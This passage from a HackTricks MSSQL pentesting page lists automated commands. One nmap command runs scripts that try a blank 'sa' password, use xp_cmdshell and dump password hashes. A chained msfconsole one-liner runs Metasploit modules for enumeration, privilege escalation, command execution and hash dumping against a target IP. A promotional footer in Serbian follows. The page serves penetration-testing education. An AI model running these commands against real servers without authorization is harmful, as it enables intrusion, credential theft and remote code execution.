Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}
|
||
|
||
Entry_3:
|
||
Name: MSSQL consolesless mfs enumeration
|
||
Description: MSSQL enumeration without the need to run msfconsole
|
||
Note: sourced from https://github.com/carlospolop/legion
|
||
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'
|
||
|
||
```
|
||
{% hint style="success" %}
|
||
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Podržite HackTricks</summary>
|
||
|
||
* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
|
||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||
|
||
</details>
|
||
{% endhint %}
|